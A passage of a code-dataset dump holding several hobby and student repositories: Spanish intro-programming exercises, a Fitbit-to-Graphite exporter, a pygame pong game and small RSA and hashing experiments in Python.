bin\n return binarioContador(contador+1) # contamos esta iteracion exitosa\n # si el numero no es un decimal, lo convertimos en un decimal primero y luego lo pasamos a binario\n else :\n decimal = sistemasPosicionales.base10(n, base)\n bin = sistemasPosicionales.otraBase(decimal, 2)\n print bin\n return binarioContador(contador+1) # contamos esta iteracion exitosa\n return binarioContador() # se ejecuta la funcion interna\n\n#binario()\n\n# menorDecimalLista : None -> None\n# Al invocarse, se abre un sistema de dialogo, el usuario inserta un numero expresado de la forma BNNNN... con B la base (de 2 a 9) y N los digitos del entero positivo en aquella base. Este numero es convertido en decimal, luego, si el usuario inserta 0 como su numero, el dialogo termina imprimiendo la informacion del decimal menor convertido.\n# ej: menorDecimalLista()\ndef menorDecimalLista() :\n # usamos una funcion interna para guardar los valores del menor decimal, de su base y de sus digitos\n def guardarMenor(menor=-1, b=0, dig=0) :\n n = input(\"n? \")\n base = aislarBase(n)\n digitos = aislarDigitos(n)\n # cerramos el ciclo si la base es 0\n if base == 0 :\n print \"menor: base=\", b, \"digitos=\", dig, \"decimal=\", menor\n return\n # si la base esta fuera del rango especificado, recomenzamos\n elif base < 2 or base > 9 :\n print \"base incorrecta\"\n return guardarMenor(menor, b, dig)\n # si el numero no esta expresado en una base correcta, recomenzamos\n elif not sistemasPosicionales.correcto(digitos, base) :\n print \"numero incorrecto\"\n return guardarMenor(menor, b, dig)\n else :\n # calculamos el decimal\n decimal = sistemasPosicionales.base10(digitos, base)\n print \"decimal=\", decimal\n # si el decimal obtenido es inferior al que estaba guardado, se reemplaza por el nuevo decimal inferior. (el caso menor == -1 quiere decir que queremos excluir el valor inicial de menor, dado a que ningun decimal nos puede salir negativo, -1 no puede corresponder a decimal)\n if decimal < menor or menor == -1:\n return guardarMenor(decimal, base, digitos)\n else:\n return guardarMenor(menor, b, dig)\n return guardarMenor() # ejecutamos funcion interna\n\n#menorDecimalLista()\n"
},
{
"alpha_fraction": 0.7336956262588501,
"alphanum_fraction": 0.7989130616188049,
"avg_line_length": 91,
"blob_id": "484259a8cc3099b01078b504c940e5918126bd91",
"content_id": "ad9b7cf13e15b2cc6e40eec629c4c30544e20f1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 187,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 2,
"path": "/README.md",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# CC1002-FCFM\nAquí se encuentran las tareas y los ejercicios para el curso de CC1002 - Introducción a la Programación de la FCFM (Universidad de Chile) del semestre de Primavera 2018.\n"
},
{
"alpha_fraction": 0.5100472569465637,
"alphanum_fraction": 0.5656028389930725,
"avg_line_length": 22.550724029541016,
"blob_id": "b5d64797e3536a51a8109e190381103762867f9a",
"content_id": "62b06af45c4953be3175319112c90b82a86ce094",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1692,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 69,
"path": "/Ejercicios/Semana 12/Tortuga.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "from Tkinter import *\r\nimport math\r\n\r\n# h, v: int (coordenadas horizontal y vertical)\r\n# cv : Canvas\r\n# angulo : float (en radianes)\r\nclass Tortuga:\r\n # __init__ : int, int, Canvas -> Tortuga\r\n # Crea tortuga en coordenadas (x, y) de canvas cv con angulo 0.\r\n # ej: t = Tortuga(W / 2, H / 2, cv)\r\n def __init__(self, x, y, cv) :\r\n self.__h = x\r\n self.__v = y\r\n self.__cv = cv\r\n self.__angulo = 0\r\n \r\n # girar : int -> None\r\n # Girar tortuga en angulo x, (sumar x al angulo).\r\n # ej: t.girar(45)\r\n def girar(self, x) :\r\n self.__angulo += x\r\n \r\n # avanzar : int -> None\r\n # Avanzar tortuga x pixeles. (dibujando linea)\r\n # ej: t.avanzar(50)\r\n def avanzar(self, x) :\r\n hNuevo = self.__h + math.cos(self.__angulo) * x\r\n vNuevo = self.__v + math.sin(self.__angulo) * x\r\n self.__cv.create_line(self.__h, self.__v, hNuevo, vNuevo)\r\n self.__h = hNuevo\r\n self.__v = vNuevo\r\n\r\nventana = Tk()\r\nancho = 200\r\nalto = 200\r\ncv = Canvas(ventana, width=ancho, height=alto)\r\ncv.pack()\r\n\r\n# Cuadrado\r\nt1 = Tortuga(ancho * 0.25, alto * 0.25, cv)\r\nt1.avanzar(20)\r\nt1.girar(math.pi / 2)\r\nt1.avanzar(20)\r\nt1.girar(math.pi / 2)\r\nt1.avanzar(20)\r\nt1.girar(math.pi / 2)\r\nt1.avanzar(20)\r\n\r\n# Triangulo\r\nt2 = Tortuga(ancho * 0.75, alto * 0.25, cv)\r\nt2.avanzar(20)\r\nt2.girar(2 * math.pi / 3)\r\nt2.avanzar(20)\r\nt2.girar(2 * math.pi / 3)\r\nt2.avanzar(20)\r\n\r\n# Pentagono\r\nt3 = Tortuga(ancho * 0.5, alto * 0.75, cv)\r\nt3.avanzar(20)\r\nt3.girar(0.4 * math.pi)\r\nt3.avanzar(20)\r\nt3.girar(0.4 * math.pi)\r\nt3.avanzar(20)\r\nt3.girar(0.4 * math.pi)\r\nt3.avanzar(20)\r\nt3.girar(0.4 * math.pi)\r\nt3.avanzar(20)\r\n\r\nventana.mainloop()"
},
{
"alpha_fraction": 0.6939102411270142,
"alphanum_fraction": 0.6939102411270142,
"avg_line_length": 29.200000762939453,
"blob_id": "40232311941a7d6a6b7f4309b0d959fe15917820",
"content_id": "1d8232c81f2962cdfa37198056d62bef904d9c12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 624,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 20,
"path": "/Ejercicios/Semana 02/main.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "import triangulo #importar modulo triangulo\r\n\r\n#pedir valor de lados al usuario.\r\nprint \"Inserte valores de los lados de su triangulo:\"\r\na = input()\r\nb = input()\r\nc = input()\r\n\r\n#calcular perimetro y area.\r\nperimetro = triangulo.perimetro(a, b, c)\r\narea = triangulo.area(a, b, c)\r\ntipo = triangulo.tipo(a, b, c)\r\n\r\n#verificar que el triangulo es valido.\r\nif triangulo.esTriangulo(a, b, c) :\r\n print \"El triangulo es de tipo:\", tipo\r\n print \"El perimetro del triangulo es:\", perimetro\r\n print \"El area del triangulo es:\", area\r\nelse :\r\n print \"Triangulo invalido por el teorema de la desigualdad de triangulos.\"\r\n"
}
] | 26 |
adamnmcc/fitbit-exporter | https://github.com/adamnmcc/fitbit-exporter | bdc7dc8ce5cc22034e8fa5a866b5272577db19ab | 04599f82c22fbb87ee3b9b374ab0d6f8193e6790 | b84330b80536eac750de117f8794fae820713b15 | refs/heads/master | 2021-01-22T18:08:08.308216 | 2015-11-10T04:35:47 | 2015-11-10T04:55:06 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5813471674919128,
"alphanum_fraction": 0.582383394241333,
"avg_line_length": 36.843135833740234,
"blob_id": "e1a5171b67cca17e83d4241cbcf95d20f8cba4ca",
"content_id": "8df696cc0388bc54d2f43ea34de404415ea92396",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1930,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 51,
"path": "/README.md",
"repo_name": "adamnmcc/fitbit-exporter",
"src_encoding": "UTF-8",
"text": "fitbit-exporter\n===============\n\nA quick and dirty, as-is tool that can export intra-day Fitbit data\nto Graphite. To use this application, you will have to create a new\nFitbit application under your account.\n\nUsage\n=====\n\n`fitbit-exporter` assumes you have a `client_id` and `client_secret`\nfor your application and expects them to be set into environmental\nvariables. Upon first run, `fitbit-exporter` will go through the OAuth\nflow and allow this application access to your account.\n\n```\nexport CLIENT_ID=1\nexport CLIENT_SECRET=2\n\n./fitbit-exporter\nusage: fitbit-exporter [-h] [--auth_host_name AUTH_HOST_NAME]\n [--noauth_local_webserver]\n [--auth_host_port [AUTH_HOST_PORT [AUTH_HOST_PORT ...]]]\n [--logging_level {DEBUG,INFO,WARNING,ERROR,CRITICAL}]\n [--debug] [--all] [--heart] [--steps] [--floors]\n [--calories] [--elevation] [--distance]\n date\n\npositional arguments:\n date The date to export in the format of YYYY-mm-dd, or\n 'today'.\n\noptional arguments:\n -h, --help show this help message and exit\n --auth_host_name AUTH_HOST_NAME\n Hostname when running a local web server.\n --noauth_local_webserver\n Do not run a local web server.\n --auth_host_port [AUTH_HOST_PORT [AUTH_HOST_PORT ...]]\n Port web server should listen on.\n --logging_level {DEBUG,INFO,WARNING,ERROR,CRITICAL}\n Set the logging level of detail.\n --debug\n --all Export all known types.\n --heart Export heart data.\n --steps Export steps data.\n --floors Export floors data.\n --calories Export calories data.\n --elevation Export elevation data.\n --distance Export distance data.\n```\n"
},
{
"alpha_fraction": 0.6144363880157471,
"alphanum_fraction": 0.6218624711036682,
"avg_line_length": 34.43684387207031,
"blob_id": "429d6b8392a58db9f2e7fa45f5678c816047fc49",
"content_id": "61569f784c5ed4ad78b942dec4e234e04619ebc1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6733,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 190,
"path": "/fitbit/exporter.py",
"repo_name": "adamnmcc/fitbit-exporter",
"src_encoding": "UTF-8",
"text": "import argparse\nimport httplib2\nimport json\nimport os\nimport socket\nimport pickle\nimport struct\n\nfrom datetime import datetime\nfrom graphitesend import GraphiteClient\nfrom base64 import urlsafe_b64encode\nfrom oauth2client.file import Storage\nfrom oauth2client.client import OAuth2WebServerFlow\nfrom oauth2client import tools\n\nAPI_HOST = 'https://api.fitbit.com'\nAPI_URL = \"%s/1/user/-\" % API_HOST\n\nEXPORTER_HOME = \"%s/.fitbit-exporter\" % os.environ['HOME']\nCREDENDIAL_STORE = \"%s/client_secrets.json\" % EXPORTER_HOME\n\nCLIENT_ID = os.environ['CLIENT_ID']\nCLIENT_SECRET = os.environ['CLIENT_SECRET']\nAUTHORIZATION = urlsafe_b64encode(bytes(\"%s:%s\" % (CLIENT_ID, CLIENT_SECRET), 'utf-8')).decode('utf-8')\n\nUTF_8 = 'utf-8'\n\nclass FitBitError(Exception):\n def __init__(self, msg):\n super().__init__(msg)\n\nclass FitBitConnection(httplib2.Http):\n \"\"\"\n FitBit requires an Authorization header to be present on every request.\n Out of the box, Google's oauth2 client does not do this. As such, this\n is a basic override to inject missing headers.\n \"\"\"\n\n def __init__(self, cache=None, timeout=None,\n proxy_info=httplib2.proxy_info_from_environment,\n ca_certs=None, disable_ssl_certificate_validation=False):\n super().__init__(cache, timeout, proxy_info, ca_certs,\n disable_ssl_certificate_validation)\n\n def request(self, uri, method=\"GET\", body=None, headers=None,\n redirections=httplib2.DEFAULT_MAX_REDIRECTS,\n connection_type=None):\n if headers is None:\n headers = {}\n if 'Authorization' not in headers:\n headers.update({'Authorization': 'Basic ' + AUTHORIZATION})\n return super().request(uri, method=method, body=body, headers=headers,\n redirections=redirections,\n connection_type=connection_type)\n\nclass FitBit:\n def __init__(self, args):\n self.http = httplib2.Http()\n #self.http = FitBitConnection()\n self.__setup(args)\n self.__authenticate(args).authorize(self.http)\n self.date = args.date\n\n def __setup(self, args):\n if not os.path.exists(EXPORTER_HOME):\n os.mkdir(EXPORTER_HOME)\n if not os.path.exists(CREDENDIAL_STORE):\n open(CREDENDIAL_STORE, 'w+').close()\n return EXPORTER_HOME, CREDENDIAL_STORE\n\n\n def __authenticate(self, args):\n flow = OAuth2WebServerFlow(\n auth_uri='https://www.fitbit.com/oauth2/authorize',\n token_uri='%s/oauth2/token' % API_HOST,\n client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET,\n scope='activity sleep weight heartrate',\n user_agent='fitbit-exporter/1.0',\n authorization_header=\"Basic \" + AUTHORIZATION)\n storage = Storage(CREDENDIAL_STORE)\n credz = storage.get()\n if credz is None or credz.invalid:\n credz = tools.run_flow(flow, storage, args)\n return credz\n\n def _activities(self, activity, granularity):\n resp, content = self.http.request(\n \"%s/activities/%s/date/%s/1d/%s.json\" %\n (API_URL, activity, self.date, granularity))\n if resp.status == 200:\n return json.loads(content.decode(UTF_8))\n else:\n raise FitBitError(\"Unable to get %s activity: %s\" % \n (activity, resp))\n\n def steps(self):\n return self._activities('steps', '1min')\n\n def heart(self):\n return self._activities('heart', '1sec')\n\n def floors(self):\n return self._activities('floors', '1min')\n\n def elevation(self):\n return self._activities('elevation', '1min')\n\n def calories(self):\n return self._activities('calories', '1min')\n\n def distance(self):\n return self._activities('distance', '1min')\n\n\nclass Graphite:\n\n def __init__(self, prefix, host='localhost', port=2004):\n self.prefix = prefix\n self.connection = (host, port)\n\n def __prefix(self, metric):\n return \"%s.%s\" % (self.prefix, metric[0])\n\n def send(self, metrics):\n prefixed = [(self.__prefix(t), (t[1][0], t[1][1])) for t in metrics]\n payload = pickle.dumps(prefixed, protocol=2)\n\n s = socket.socket()\n s.connect(self.connection)\n s.sendall(struct.pack('!L', len(payload)))\n s.sendall(payload)\n s.close()\n\n\ndef _parse_activities(activity, raw_data):\n data = []\n date = raw_data[\"activities-%s\" % activity][0]['dateTime']\n for m in raw_data[\"activities-%s-intraday\" % activity]['dataset']:\n instant = \"%s %s\" % (date, m['time'])\n instant = datetime.strptime(instant, '%Y-%m-%d %H:%M:%S')\n epoch = instant.strftime('%s')\n data.append((activity, (int(epoch), int(m['value']))))\n return data\n\ndef _try_query(activity, graphite, fn):\n try:\n graphite.send(_parse_activities(activity, fn()))\n except FitBitError as e:\n print(str(e))\n\ndef main(argv=None):\n parser = argparse.ArgumentParser(parents=[tools.argparser])\n parser.add_argument('--debug', action='store_true', default=False)\n parser.add_argument('--all', action='store_true', default=False, help='Export all known types.')\n parser.add_argument('--heart', action='store_true', default=False, help='Export heart data.')\n parser.add_argument('--steps', action='store_true', default=False, help='Export steps data.')\n parser.add_argument('--floors', action='store_true', default=False, help='Export floors data.')\n parser.add_argument('--calories', action='store_true', default=False, help='Export calories data.')\n parser.add_argument('--elevation', action='store_true', default=False, help='Export elevation data.')\n parser.add_argument('--distance', action='store_true', default=False, help='Export distance data.')\n parser.add_argument('date', help='The date to export in the format of YYYY-mm-dd, or \\'today\\'.')\n args = parser.parse_args()\n if args.debug:\n httplib2.debuglevel=4\n\n graphite = Graphite('fitness')\n client = FitBit(args)\n\n if args.heart or args.all:\n _try_query('heart', graphite, client.heart)\n\n if args.steps or args.all:\n _try_query('steps', graphite, client.steps)\n\n if args.floors or args.all:\n _try_query('floors', graphite, client.floors)\n\n if args.calories or args.all:\n _try_query('calories', graphite, client.calories)\n\n if args.elevation or args.all:\n _try_query('elevation', graphite, client.elevation)\n\n if args.distance or args.all:\n _try_query('distance', graphite, client.distance)\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 2 |
RaissonSouto/pong | https://github.com/RaissonSouto/pong | f9bc0b05a7e25496003266d644dc7d84d10f59cd | b1829b52e1ea47caa35ae0b7a84db53116e34fff | f4b7a4b75e3675c971b247f3749b8dd410997258 | refs/heads/master | 2020-07-27T00:54:03.276065 | 2019-12-19T02:34:42 | 2019-12-19T02:34:42 | 208,814,852 | 3 | 7 | null | 2019-09-16T14:03:45 | 2019-10-14T09:20:14 | 2019-10-14T09:20:13 | Python | [
{
"alpha_fraction": 0.5512295365333557,
"alphanum_fraction": 0.6096311211585999,
"avg_line_length": 24.6842098236084,
"blob_id": "ff108e39b024c247430f1933c47cd3027ab80de7",
"content_id": "0a8dc8c101675110cc8538b4850b33b2983756b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 976,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 38,
"path": "/script/functions.py",
"repo_name": "RaissonSouto/pong",
"src_encoding": "UTF-8",
"text": "import pygame,sys\nfrom pygame import *\n\npygame.init()\n\ncolors = {\n 'black': (0,0,0),\n 'white': (255,255,255),\n 'red': (255,0,0),\n 'green': (0,255,0),\n 'blue': (0,0,255),\n 'yellow': (255,255,0),\n 'orange': (255,140,0),\n 'pink': (255,20,147),\n 'purple': (128,0,128)\n}\n\ndef exit():\n #condicoes de saida\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n key = pygame.key.get_pressed()\n if key[K_w] and key[K_LCTRL]:\n sys.exit()\n\n### func click ta atrapalhando no desempenho da func exit\n\n\ndef text(text,screen,size,px,py,font = pygame.font.get_default_font(),color = colors['white']):\n\n font = pygame.font.SysFont(font, size)\n text = font.render(text, 1, color) # essa funcao tem como parametros texto, suavidade, cor, background=None\n screen.blit(text,(px,py)) # pra printar na tela\n return text.get_width(),text.get_height() # pra ter as dimensoes pro botao\n\npygame.quit()\n"
},
{
"alpha_fraction": 0.6413792967796326,
"alphanum_fraction": 0.6764890551567078,
"avg_line_length": 18.45121955871582,
"blob_id": "389f9d200109973bcd16e8e0fb0418c83098a833",
"content_id": "9628dde0a90ce26f5683e66e7660774444e5ccd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1595,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 82,
"path": "/script/gameClasses.py",
"repo_name": "RaissonSouto/pong",
"src_encoding": "UTF-8",
"text": "import pygame\nfrom random import uniform as decimalValueGenerator # 0 < x < 1\nfrom random import choice\nfrom functions import text,colors\nfrom math import sqrt\nfrom pygame.locals import *\n\npygame.init()\n\nclass rect():\n\n\tcolor = colors['white']\n\twidth = 25\n\theight = 100\n\tposx = 100\n\tposy = 250\n\tspeedy = 4\n\n\tdef collide(self,object):\n\t\trect1 = Rect(self.posx, self.posy, self.width, self.height)\n\t\trect2 = Rect(object.posx, object.posy, object.width, object.height)\n\n\t\tif rect1.colliderect(rect2):\n\t\t\tobject.speedx = -object.speedx\n\n\tdef draw(self,screen):\n\t\tpygame.draw.rect(screen, self.color,(self.posx,self.posy,self.width,self.height))\n\nclass ball(rect):\n\n\tspeedx = 1\n\n\tdef limit(self,screenSize):\n\t\tif self.posy <= 0 or self.posy + self.height >= screenSize[1]:\n\t\t\tself.speedy = -self.speedy\n\n\tdef speed(self):\n\n\t\tdef speedXGenerator():\n\n\t\t\tself.speedx = decimalValueGenerator(-0.8,0.8)\n\t\t\tif self.speedx <= 0.25 and self.speedx >= -0.25:\n\t\t\t\tspeedXGenerator()\n\n\t\tspeedXGenerator()\n\n\t\tself.speedy = sqrt(1-self.speedx**2)*choice([1,-1])\n\n\tdef move(self):\n\n\t\tself.speedx *= 1.001\n\t\tself.speedy *= 1.001\n\n\t\tself.posx += self.speedx\n\t\tself.posy += self.speedy\n\n\tdef reset(self):\n\t\tself.posx = 488\n\t\tself.posy = 288\n\t\tself.speedx = 0\n\t\tself.speedy = 0\n\t\tself.speed()\n\nclass player(rect):\n\n\tscore = 0\n\n\tdef limit(self,screenSize):\n\n\t\tif self.posy <= 0:\n\t\t\tself.posy = 0\n\n\t\telif self.posy + self.height >= screenSize[1]:\n\t\t\tself.posy = screenSize[1] - self.height\n\n\tdef move(self,up,down,key):\n\t\tif key[up]:\n\t\t\tself.posy -= self.speedy\n\n\t\tif key[down]:\n\t\t\tself.posy += self.speedy\npygame.quit()\n"
},
{
"alpha_fraction": 0.7519582509994507,
"alphanum_fraction": 0.7728459239006042,
"avg_line_length": 30.91666603088379,
"blob_id": "5f3c7a1165c127b38748f86ae4445ff18740138f",
"content_id": "b56d0fd3dcfe7bb0614c3dac24d11d4664976c20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 12,
"path": "/README.md",
"repo_name": "RaissonSouto/pong",
"src_encoding": "UTF-8",
"text": "Sobre o jogo:\n Esse jogo foi feito para marcar o final do meu primeiro periodo na universidade, é um jogo utilizando pygame\ne é o meu primeiro projeto sobre jogos.\n\nData inicial: 16/09/2019\n\nMetas:\n- Terminar o jogo base em perfeito funcionamento;\n- Criar um client legal;\n- Colocar efeitos no jogo;\n- Colocar um bot pra jogar;\n- Fazer pessoas poderem jogar de máquinas diferentes;\n"
},
{
"alpha_fraction": 0.6586867570877075,
"alphanum_fraction": 0.7031463980674744,
"avg_line_length": 17.98701286315918,
"blob_id": "42f77fcc3e32ac20f08ee7a123149281ca97ee22",
"content_id": "ce5c93d5588ecd6b0a527343ff8c707b69f9871e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1462,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 77,
"path": "/script/game.py",
"repo_name": "RaissonSouto/pong",
"src_encoding": "UTF-8",
"text": "import pygame\nfrom gameClasses import rect,player,ball\nfrom functions import colors,exit,text\nfrom pygame.locals import *\n\npygame.init()\n\nscreenSize = screenWidth, screenHeight = 1000, 600\nscreen = pygame.display.set_mode(screenSize)\npygame.display.set_caption(\"\")\n\ndef game():\n\n\tscreenSize = screenWidth, screenHeight = 1000, 600\n\tscreen = pygame.display.set_mode(screenSize)\n\n\tplayer1 = player()\n\n\tplayer2 = player()\n\tplayer2.posx = 875\n\n\tmainBall = ball()\n\tmainBall.height = 25\n\tmainBall.posx = 480\n\tmainBall.posy = 288\n\n\tmainBall.speed()\n\n\twhile True:\n\n\t\texit()\n\n\t\tclock = pygame.time.Clock()\n\t\tclock.tick(120)\n\n\t\tkey = pygame.key.get_pressed()\n\n\t\tplayer1.move(K_w,K_s,key)\n\t\tplayer1.limit(screenSize)\n\n\t\tplayer2.move(K_UP,K_DOWN,key)\n\t\tplayer2.limit(screenSize)\n\n\t\tplayer1.collide(mainBall)\n\t\tplayer2.collide(mainBall)\n\n\t\tmainBall.limit(screenSize)\n\t\tmainBall.move()\n\n\t\t### ajeitar as funcoes de colissao\n\n\t\tif mainBall.posx <= 0:\n\n\t\t\tmainBall.reset()\n\t\t\t#pygame.time.delay(1000) ###ajeitar isso pq ta travado ate pra fechar o jogo\n\t\t\tplayer2.score += 1\n\n\t\telif mainBall.posx + mainBall.width >= screenWidth:\n\n\t\t\tmainBall.reset()\n\t\t\t#pygame.time.delay(1000)\n\t\t\tplayer1.score += 1\n\n\t\tif player1.score == 5 or player2.score == 5:\n\t\t\tbreak\n\n\t\tscreen.fill(colors['black'])\n\t\tplayer1.draw(screen)\n\t\tplayer2.draw(screen)\n\t\tmainBall.draw(screen)\n\t\ttext('%d x %d' %(player1.score,player2.score), screen, 45, 480, 60)\n\n\t\tpygame.display.flip()\n\ngame()\n\npygame.quit()\n"
}
] | 4 |
Fakrul05/pms | https://github.com/Fakrul05/pms | 825bbd089eb69206152b91f218653821ec857d79 | b96b8a285d35b842ef83ce58a76567eed5ef9d72 | 7a3a862707120da43341c02dab20e7d286b467d5 | refs/heads/master | 2020-02-05T17:45:59.214324 | 2017-07-19T14:27:09 | 2017-07-19T14:27:09 | 97,709,722 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7371428608894348,
"alphanum_fraction": 0.7371428608894348,
"avg_line_length": 34,
"blob_id": "1b7c70e0949e1a27742e9ec577866ad1e8dcd16a",
"content_id": "653910ac4134955c310c8179dd017cdedd837d9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 175,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 5,
"path": "/newwnv/bin/django-admin.py",
"repo_name": "Fakrul05/pms",
"src_encoding": "UTF-8",
"text": "#!/home/fakrul/Documents/pharmacy_Managment_System/newwnv/bin/python\nfrom django.core import management\n\nif __name__ == \"__main__\":\n management.execute_from_command_line()\n"
},
{
"alpha_fraction": 0.8064516186714172,
"alphanum_fraction": 0.8064516186714172,
"avg_line_length": 14.5,
"blob_id": "bb2bc55d7d9df1d59e7551b9e8e333c0ee0c97ac",
"content_id": "6bb27ab1fd031b7d0f5208a1cfe101948a091ffa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 31,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Fakrul05/pms",
"src_encoding": "UTF-8",
"text": "# pms\nparmacy managment system\n"
}
] | 2 |
uraninite/rsa-cryptography | https://github.com/uraninite/rsa-cryptography | 6aadb30fd4a2663781b4a366fc48e74674c39a5f | 0403bf123c0f65e05beb1a294303c2abd072032f | b4a7bd21bd8467f57d12cfef150545805f89bb3c | refs/heads/main | 2023-06-22T17:54:53.570451 | 2021-07-22T23:25:17 | 2021-07-22T23:25:17 | 384,240,199 | 2 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6919263601303101,
"alphanum_fraction": 0.6990085244178772,
"avg_line_length": 20.393939971923828,
"blob_id": "f0d2ed35b348983916c2748829ada5e2ea7e6b51",
"content_id": "494d1e8994373037bbad26e1bc6ceecb332b8884",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1412,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 66,
"path": "/src/mod/main.py",
"repo_name": "uraninite/rsa-cryptography",
"src_encoding": "UTF-8",
"text": "#import packages\nimport os, sys\n\ntry:\n from Crypto.PublicKey import RSA\nexcept:\n print('pycryptodome not found')\n os.system('pip install pycryptodome')\n #clear\n os.system('reset')\n from Crypto.PublicKey import RSA\n\nimport Crypto.Random\nfrom Crypto.Cipher import PKCS1_OAEP\nimport binascii\n\n\n#key generation\nrandomByte = Crypto.Random.get_random_bytes(191)\nprint(type(randomByte), randomByte)\nprint(\"\\n\")\nbyteToInt = int.from_bytes(randomByte, \"big\")\nprint(byteToInt)\nprint(\"\\n\")\nprint(byteToInt.to_bytes(sys.getsizeof(byteToInt), 'little'))\n\n\ndef fakerandfunc(n):\n print(n, \"\\n\")\n get = Crypto.Random.get_random_bytes(n)\n print(get, \"\\n\\n\")\n return get\n\n\"\"\"\"\nkeyPair = RSA.generate(3072, randfunc=fakerandfunc)\n\n\npubKey = keyPair.publickey()\nprint(f\"Public key: (n={hex(pubKey.n)}, e={hex(pubKey.e)})\")\npubKeyPEM = pubKey.exportKey()\nprint(pubKeyPEM.decode('ascii'))\n\nprint(f\"Private key: (n={hex(pubKey.n)}, d={hex(keyPair.d)})\")\nprivKeyPEM = keyPair.exportKey()\nprint(privKeyPEM.decode('ascii'))\n\n\n\n\n#encryption\nmsg = b'A message for encryption'\nencryptor = PKCS1_OAEP.new(pubKey)\nencrypted = encryptor.encrypt(msg)\nprint(\"Encrypted:\", binascii.hexlify(encrypted))\n\n\n\n#decrpytion\ndecryptor = PKCS1_OAEP.new(keyPair)\ndecrypted = decryptor.decrypt(encrypted)\nprint('Decrypted:', decrypted)\n\n\n#source world wide web cryptobook.nakov.com\n\n\"\"\"\n"
},
{
"alpha_fraction": 0.4930362105369568,
"alphanum_fraction": 0.5106778144836426,
"avg_line_length": 16.590164184570312,
"blob_id": "50bccc13acd250ed7da1c8b2fce54d3b3d67ff98",
"content_id": "a83951bdb30436044a38abdeca155deab0a27e42",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1077,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 61,
"path": "/src/mod/hashbin.py",
"repo_name": "uraninite/rsa-cryptography",
"src_encoding": "UTF-8",
"text": " \nimport hashlib\n \n# initializing string\nstr = \"TOKENAUTHNLX\"\n \n# encoding GeeksforGeeks using encode()\n# then sending to SHA256()\ntoken = hashlib.sha512(str.encode())\n\n\ndef modrandfunc(token, n):\n n+=n\n token = token.digest().hex()\n \n if (len(token) < n):\n j = n - 128\n \n longByte = \"\"\n\n while (len(longByte) <= n):\n longByte+=token\n \n #modrandfunc(token, )\n \n print(j, n)\n \n\n\n return longByte[:n]\n elif (len(token) == n): \n return token\n else:\n return token[:n]\n\nprint(modrandfunc(token, 500))\n\nprint(\"\\n\")\n\n# printing the equivalent hexadecimal value.\nprint(\"The binary equivalent of SHA256 is :\")\n\nprint(\"\\n\")\n\n\nprint(bytes.fromhex(modrandfunc(token, 191)))\n\nprint(\"\\n\")\n\nprint(token.digest())\n\nprint(\"\\n\")\n\nprint(token.digest().hex())\n\nprint(\"\\n\")\n\nprint(bytes.fromhex(token.digest().hex()))\n\nprint(\"\\n\")\n\nprint(token.digest().hex()[:2])\n\n"
},
{
"alpha_fraction": 0.7051020264625549,
"alphanum_fraction": 0.7122448682785034,
"avg_line_length": 19,
"blob_id": "d3bb6d1e3825240522709bc06fc5a181c72e1eb6",
"content_id": "f31a1630ed1944e59d079cdb5fa240462fae8484",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 980,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 49,
"path": "/src/src/main.py",
"repo_name": "uraninite/rsa-cryptography",
"src_encoding": "UTF-8",
